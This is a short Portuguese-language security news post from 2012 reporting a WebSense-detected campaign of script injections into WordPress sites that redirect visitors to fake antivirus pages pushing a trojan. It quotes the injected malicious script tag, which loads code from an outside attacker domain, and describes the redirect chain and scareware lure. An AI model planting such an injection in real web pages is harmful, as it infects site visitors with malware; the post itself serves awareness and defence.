• Injeções Massivas em Sites WordPress

    Publicado em 11-03-2012 22:30
    0 Comentários Comentários
    Através de um trabalho feito pela WebSense, foi detectada no decorrer da última semana, uma nova onda de ataques massivos de injeções, de uma campanha de um conhecido programa antivírus. A maioria dos alvos, são sites hospedados pelo sistema de gerenciamento de conteúdo WordPress. No momento da publicação desta notícia, mais de 200.000 páginas da Web haviam sido comprometidas, girando em torno de 30.000 sites originais (hosts). A injeção maliciosa seqüestra visitantes para os sites comprometidos, e os redireciona para sites de antivírus falsos que tentam enganá-los para baixar e instalar (sem que eles saibam), um cavalo de tróia em seu computador. O código injetado é muito curto e é colocado na parte inferior da página:

    <script src="http://ionis901andsi.rr.nu/mm.php?d=1"></script>

    Após um redirecionamento em uma cadeia de três níveis, as vítimas chegam até um site falso de AV. Neste exemplo, a primeira corrente é o ".rr.nu", e o local de "pouso" é o domínio de nível superior "De.lv". Porém, o local de "pouso" está sempre mudando. Além disso, o site AV malicioso, aparece para executar uma varredura no computador e assustar o usuário, exibindo falsas detecções de malware e trojans. A página parece uma janela do Windows Explorer. O processo de scanning falso se parece com um aplicativo do Windows normal. No entanto, é apenas uma janela pop-up no navegador. O falso antivírus em seguida, solicita que os visitantes baixem e executem sua "ferramenta antivírus" para remover os trojans supostamente encontrados, mas o grande problema nesse cenário, é que o executável, é o próprio Trojan.


    Saiba Mais:

    [1] Help Net Security http://www.net-security.org/article.php?id=1684
    + Enviar Comentário